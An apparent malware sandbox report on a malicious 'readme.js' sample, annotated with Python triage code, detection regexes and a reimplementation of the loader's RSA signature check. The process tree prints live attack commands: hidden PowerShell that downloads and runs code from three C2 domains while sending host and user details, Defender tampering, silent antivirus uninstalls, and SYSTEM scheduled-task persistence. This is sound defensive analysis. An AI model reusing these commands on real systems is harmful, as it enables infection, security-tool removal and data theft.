Analysis

  • max time kernel
    15s
  • max time network
    89s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 06:49

General

  • Target   readme.js
  • Size     10KB
  • MD5      db49b6f1f379122685be9553c5cc0f37
  • SHA1     45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
  • SHA256   d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
  • SHA512   1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23

Score
10/10

Malware Config

  • Extracted
    Language      ps1
    Deobfuscated
    URLs          exe.dropper: http://t.zz3r0.com
  • Extracted
    Language      ps1
    Deobfuscated
    URLs          exe.dropper: http://t.zer9g.com
  • Extracted
    Language      ps1
    Deobfuscated
    URLs          exe.dropper: http://t.bb3u9.com

Signatures

  • Blocklisted process makes network request (1 IoC)
  • Creates scheduled task(s) (1 TTP, 4 IoCs)
    Schtasks is often used by malware for persistence or to perform post-infection execution.
  • Opens file in notepad (likely ransom note) (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (6 IoCs)
  • Suspicious use of AdjustPrivilegeToken (44 IoCs)
  • Suspicious use of WriteProcessMemory (10 IoCs)
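
Every signature in this list is fired by a command line in the process tree that follows. As an added example, not part of the sandbox report and not the sample's own code, here is a small Python triage script that undoes the two obfuscation tricks those command lines rely on (backtick-split keywords such as IE`x and Ne`w-Obj`ect, and URLs assembled from 'http://t.z'+'er9g.com' string concatenation plus a $url variable), pulls out the resulting URLs, and re-derives the behaviour flags with plain regexes. The input list is constructed from the tree (the stage-2 PowerShell.EXE line is abridged, with its RSA modulus cut out); the rule names and regexes are my own, not the sandbox's.

```python
import re

# Command lines copied from the sandbox process tree on this page (constructed input list
# for offline use; the last entry is the stage-2 PowerShell.EXE line abridged to its
# download, verify and URL-building parts, with the RSA modulus cut out).
CMDLINES = [
    "powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')",
    r'"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1',
    "wmic.exe product where \"name like '%Eset%'\" call uninstall /nointeractive",
    r'"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \eDTR6r3P4nC /F /tr "powershell -w hidden -c PS_CMD"',
    (r'powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);'
     r"$c=$d.count;if($c -gt 173){$b=$d[173..$c];if($r.verifyData($b,(New-Object Security.Cryptography."
     r"SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}"
     r"$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,"
     r"(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))"),
]

# Behaviours seen in the tree, expressed as regexes over the *deobfuscated* command line
# (rule names are mine, not the sandbox's).
RULES = {
    "hidden_powershell_download": re.compile(
        r"powershell.*?-w\s+hidden.*?(DownloadString|DownloadData|IEX|Invoke-Expression)", re.I | re.S),
    "defender_tamper": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    "av_uninstall_wmic": re.compile(r"wmic(\.exe)?\s+product\s+where\s+.*?call\s+uninstall", re.I),
    "schtasks_run_as_system": re.compile(r"schtasks.*?/create.*?/ru\s+system", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def _fold_concat(s: str) -> str:
    """Collapse 'a'+'b' (+'c' ...) into one literal; loop until nothing changes."""
    while True:
        folded = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
        if folded == s:
            return s
        s = folded


def deobfuscate(cmd: str) -> str:
    # 1. Drop the backtick escapes used to split keywords (IE`x, Ne`w-Obj`ect). This is safe
    #    for bareword tokens; inside double-quoted strings `n and `t would be real escapes.
    s = re.sub(r"`(?=[A-Za-z-])", "", cmd)
    s = _fold_concat(s)
    # 2. Inline $var='literal' wherever $var is used in a later concatenation ($url+'/a.jsp'),
    #    then fold again so the complete URL appears as a single literal.
    for name, val in re.findall(r"\$(\w+)\s*=\s*'([^']*)'", s):
        s = re.sub(rf"\${name}(?=\s*\+)", lambda _m, v=val: f"'{v}'", s)
    return _fold_concat(s)


def extract_urls(s: str) -> list:
    return sorted(set(URL_RE.findall(s)))


def triage(cmdline: str) -> dict:
    clean = deobfuscate(cmdline)
    return {
        "deobfuscated": clean,
        "urls": extract_urls(clean),
        "flags": [name for name, rx in RULES.items() if rx.search(clean)],
    }


if __name__ == "__main__":
    for line in CMDLINES:
        result = triage(line)
        print(result["flags"], result["urls"])
```

One caveat the tree makes visible: the text Set-MpPreference -DisableRealtimeMonitoring 1 appears only in a cmd.exe /c echo line, and the powershell.exe launched next to it (PID 2260) carries just -w hidden with no command argument, which is consistent with the script being fed over stdin. A rule that inspects only powershell.exe command lines never sees it; match the echo parent as above, or rely on PowerShell script block logging (event 4104), which records what actually ran regardless of how it arrived. Note also that the "likely ransom note" signature is triggered by notepad opening readme.js itself, the script that is running: there is no ransom note in this tree, just the window a user who double-clicked "readme.js" would expect to see.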

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:648
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\system32\notepad.exe
        notepad C:\Users\Admin\AppData\Local\Temp\readme.js
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:696
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4052
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
          4⤵
            PID:2452
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
            4⤵
              PID:3356
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
                5⤵
                  PID:208
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
                4⤵
                  PID:4076
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
                    5⤵
                      PID:3024
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
                    4⤵
                      PID:3032
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
                        5⤵
                          PID:1188
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
                        4⤵
                          PID:2116
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
                            5⤵
                              PID:1836
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
                            4⤵
                              PID:2932
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
                                5⤵
                                  PID:2996
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
                                4⤵
                                  PID:868
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
                                    5⤵
                                      PID:2052
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
                                    4⤵
                                      PID:3920
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
                                        5⤵
                                          PID:3124
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
                                        4⤵
                                          PID:3872
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
                                          4⤵
                                          • Creates scheduled task(s)
                                          PID:3972
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \eDTR6r3P4nC /F /tr "powershell -w hidden -c PS_CMD"
                                          4⤵
                                          • Creates scheduled task(s)
                                          PID:3872
                                        • C:\Windows\system32\schtasks.exe
                                          "C:\Windows\system32\schtasks.exe" /run /tn \eDTR6r3P4nC
                                          4⤵
                                            PID:4216
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn LmHfWZxK4\4aSTNpL0 /F /tr "powershell -w hidden -c PS_CMD"
                                            4⤵
                                            • Creates scheduled task(s)
                                            PID:4528
                                          • C:\Windows\system32\schtasks.exe
                                            "C:\Windows\system32\schtasks.exe" /run /tn LmHfWZxK4\4aSTNpL0
                                            4⤵
                                              PID:4732
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX /F /tr "powershell -w hidden -c PS_CMD"
                                              4⤵
                                              • Creates scheduled task(s)
                                              PID:4324
                                            • C:\Windows\system32\schtasks.exe
                                              "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX
                                              4⤵
                                                PID:4288
                                        • C:\Windows\system32\msiexec.exe
                                          C:\Windows\system32\msiexec.exe /V
                                          1⤵
                                            PID:3872
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
                                            1⤵
                                              PID:4236
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
                                              1⤵
                                                PID:4752
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
                                                1⤵
                                                  PID:4268
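
The three powershell.EXE entries at the end of the tree (the payload of the /ru system scheduled tasks; the dropped files under C:\Windows\system32\config\systemprofile in the Downloads list confirm they ran as SYSTEM) deserve a close read. The loader fetches /a.jsp with the host name, user name, SMBIOS UUID and a random number, and only executes the reply if an RSA signature over it verifies against a hard-coded public key. The wire format is 172 base64 characters of signature, one separator byte, then the script: 172 base64 characters is exactly a 128-byte signature, which matches the 1024-bit modulus. The Python below, added here as an illustration and not taken from the sample or the sandbox, reimplements that check (PKCS#1 v1.5 with SHA-1, which is what RSACryptoServiceProvider.VerifyData with a SHA1CryptoServiceProvider computes) using a throwaway key pair so the positive path can be exercised offline; the operator's modulus is copied from the tree only so it can be pinned and fingerprinted. Function and constant names, the separator byte and the stand-in payload are my assumptions.

```python
import base64
import hashlib
import hmac
import random

# Public key copied verbatim from the stage-2 PowerShell in the process tree above:
# RSA-1024 modulus, exponent 0x010001. Only the operator holds the matching private key.
OPERATOR_MODULUS_B64 = "2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10="
SIG_B64_LEN = 172      # loader takes $d[0..171] as the base64 signature
PAYLOAD_OFFSET = 173   # skips one separator byte, executes $d[173..] (guarded by $c -gt 173)
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")  # PKCS#1 v1.5 DigestInfo for SHA-1


def operator_modulus() -> int:
    return int.from_bytes(base64.b64decode(OPERATOR_MODULUS_B64), "big")


def operator_key_fingerprint() -> str:
    """SHA-256 of the raw modulus: a stable indicator for this key across domains and samples."""
    return hashlib.sha256(base64.b64decode(OPERATOR_MODULUS_B64)).hexdigest()


# Toy RSA key generation so the demo can produce a *valid* blob. Demo only: Python's random
# is not a CSPRNG and nothing here is side-channel hardened.
def _probable_prime(n: int, rounds: int = 16) -> bool:
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):                      # Miller-Rabin
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_keypair(bits: int = 1024, e: int = 65537):
    while True:
        p = q = 0
        while not _probable_prime(p):
            p = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        while not _probable_prime(q):
            q = random.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and phi % e:
            return n, e, pow(e, -1, phi)


# What RSACryptoServiceProvider.VerifyData(data, SHA1, sig) checks: EMSA-PKCS1-v1_5 with SHA-1.
def _emsa_pkcs1_v15_sha1(message: bytes, k: int) -> bytes:
    t = SHA1_DIGESTINFO + hashlib.sha1(message).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(message: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    em = int.from_bytes(_emsa_pkcs1_v15_sha1(message, k), "big")
    return pow(em, d, n).to_bytes(k, "big")


def verify(message: bytes, sig: bytes, n: int, e: int = 65537) -> bool:
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, _emsa_pkcs1_v15_sha1(message, k))


# The wire format the loader expects from /a.jsp (separator byte assumed to be "\n").
def build_blob(payload: bytes, n: int, d: int) -> bytes:
    """base64(sig) [172 bytes] + 1 separator byte + script bytes, i.e. what the C2 would serve."""
    return base64.b64encode(sign(payload, n, d)) + b"\n" + payload


def loader_would_execute(blob: bytes, n: int, e: int = 65537) -> bool:
    """Mirror of function a() in the tree: True iff the loader would IEX the payload."""
    if len(blob) <= PAYLOAD_OFFSET:
        return False
    try:
        sig = base64.b64decode(blob[:SIG_B64_LEN], validate=True)
    except ValueError:
        return False
    return verify(blob[PAYLOAD_OFFSET:], sig, n, e)


if __name__ == "__main__":
    n, e, d = generate_keypair()
    payload = b"Write-Host 'constructed stand-in for the stage-2 script'"
    blob = build_blob(payload, n, d)
    print("signed by our key, our key pinned: ", loader_would_execute(blob, n, e))
    print("payload swapped after signing:     ", loader_would_execute(blob[:PAYLOAD_OFFSET] + b"calc.exe", n, e))
    print("same blob against the operator key:", loader_would_execute(blob, operator_modulus()))
    print("operator key fingerprint:", operator_key_fingerprint())
```

Two practical consequences follow. Sinkholing or seizing t.zz3r0.com, t.zer9g.com or t.bb3u9.com does not let a defender push a clean-up script to infected hosts: without the private key nothing served from those domains passes the check, which is what the operator_modulus() case shows. Conversely, the modulus is a longer-lived indicator than the domains, because tasks already installed on victims embed this key and the operator has to keep signing with it for them; the fingerprint function gives a hash to match on in loaders captured from other samples.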

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Execution: Scheduled Task (T1053), 1
  • Persistence: Scheduled Task (T1053), 1
  • Privilege Escalation: Scheduled Task (T1053), 1

Downloads

  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
    MD5     8a313b70fd641fc4e6fffb40391d0b4d
    SHA1    22684fe19ecd7943ac18e622db0d7f161db500e8
    SHA256  bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911
    SHA512  5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246
  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5     b7ce5874fdff5e4fccdc0fbd21ae7971
    SHA1    980d0d37b937620706eabba421e2e5b30a4b15f7
    SHA256  1933f8e519dbd64305997d47fa8a68b2184a8a66ea1d187cc82d788e684fe4b9
    SHA512  7e33fdf9cc1f1525b23fc960d2e8294d34272701100877a2a5b1028f32e7161e38d8e518bf41ddcca9a050755b05efa3cb86ba22c8e89e06555482a6ab04ee3b
  • memory/208-15-0x0000000000000000-mapping.dmp
  • memory/696-3-0x0000000000000000-mapping.dmp
  • memory/868-24-0x0000000000000000-mapping.dmp
  • memory/1188-19-0x0000000000000000-mapping.dmp
  • memory/1836-21-0x0000000000000000-mapping.dmp
  • memory/2052-25-0x0000000000000000-mapping.dmp
  • memory/2116-20-0x0000000000000000-mapping.dmp
  • memory/2260-12-0x0000024FCF2E0000-0x0000024FCF2E1000-memory.dmp (Filesize 4KB)
  • memory/2260-10-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp (Filesize 9.9MB)
  • memory/2260-9-0x0000000000000000-mapping.dmp
  • memory/2452-8-0x0000000000000000-mapping.dmp
  • memory/2848-2-0x0000000000000000-mapping.dmp
  • memory/2932-22-0x0000000000000000-mapping.dmp
  • memory/2996-23-0x0000000000000000-mapping.dmp
  • memory/3024-17-0x0000000000000000-mapping.dmp
  • memory/3032-18-0x0000000000000000-mapping.dmp
  • memory/3124-27-0x0000000000000000-mapping.dmp
  • memory/3356-14-0x0000000000000000-mapping.dmp
  • memory/3872-28-0x0000000000000000-mapping.dmp
  • memory/3872-30-0x0000000000000000-mapping.dmp
  • memory/3920-26-0x0000000000000000-mapping.dmp
  • memory/3972-29-0x0000000000000000-mapping.dmp
  • memory/4052-7-0x00000171E4140000-0x00000171E4141000-memory.dmp (Filesize 4KB)
  • memory/4052-6-0x00000171E3F90000-0x00000171E3F91000-memory.dmp (Filesize 4KB)
  • memory/4052-5-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp (Filesize 9.9MB)
  • memory/4052-4-0x0000000000000000-mapping.dmp
  • memory/4076-16-0x0000000000000000-mapping.dmp
  • memory/4216-31-0x0000000000000000-mapping.dmp
  • memory/4236-32-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp (Filesize 9.9MB)
  • memory/4268-44-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp (Filesize 9.9MB)
  • memory/4288-43-0x0000000000000000-mapping.dmp
  • memory/4324-42-0x0000000000000000-mapping.dmp
  • memory/4528-35-0x0000000000000000-mapping.dmp
  • memory/4732-36-0x0000000000000000-mapping.dmp
  • memory/4752-38-0x00007FF91F520000-0x00007FF91FF0C000-memory.dmp (Filesize 9.9MB)